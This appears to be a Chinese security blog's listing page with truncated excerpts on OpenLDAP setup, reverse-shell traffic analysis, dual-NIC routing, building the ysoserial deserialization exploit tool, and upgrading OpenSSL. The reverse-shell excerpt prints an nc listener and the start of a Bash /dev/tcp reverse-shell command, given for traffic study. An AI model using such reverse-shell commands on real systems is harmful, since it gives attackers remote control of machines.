OpenLDAP搭建与ldap认证流量简要分析
LDAP(Light Directory Access Portocol)轻型目录访问协议,通过IP协议提供访问控制和维护分布式信息的目录信息。通常使用ldap来实现访问控制、权限管理、资源管理等,Microsoft Active Directory即使用ldap协议来做域控用户登录认证,而OpenLDAP则是利用ldap协议实现开源的统一认证服务。本文OpenLDAP的搭建基于简书博主小尛...
LDAP(Light Directory Access Portocol)轻型目录访问协议,通过IP协议提供访问控制和维护分布式信息的目录信息。通常使用ldap来实现访问控制、权限管理、资源管理等,Microsoft Active Directory即使用ldap协议来做域控用户登录认证,而OpenLDAP则是利用ldap协议实现开源的统一认证服务。本文OpenLDAP的搭建基于简书博主小尛...
反弹shell(reverse shell)是控制端监听某端口,受控端发起连接到控制端。互联网上有大量关于反弹shell的资料,这里不再论述,本文只是分析一下linux系统下各种反弹shell的流量。控制端:kali受控端:centos7控制端开启nc监听命令:nc -lvp 33330x01 Bash反弹shell/bin/bash -i >& /dev/tcp/192.16...
有两台主机分别为a和b网段,互相ping不通,但是有一台双网卡主机的双网卡对应的IP正好位于a和b网段,双网卡主机可以分别ping通跨网段的这两台主机,此时就可以让这台中间双网卡主机作为数据包转发的“桥梁”,利用路由表,充当路由器的作用。实验主机:A主机(linux,IP:192.168.2.2)、双网卡主机(win10,IP:192.168.2.3、192.168.3.3)、B主机(lin...
0x01 ysoserial简介ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload。github上提示说 JRE <= 1.7u21 ,但是我安装提示下载jdk-1.7u21进行编译时,会报错,所以记录一下。0x02 jitpack.io下载jar包ysoserial上提示下载 Download Latest Sna...
实验环境:centos70x01 升级openssl在centos7中使用yum安装的openssl,发现版本比较老,停留在OpenSSL 1.0.2k-fips 26 Jan 2017,所以升级一下openssl到OpenSSL 1.1.1i 8 Dec 2020。wget https://www.openssl.org/source/openssl-1.1.1i.tar.gz #下载...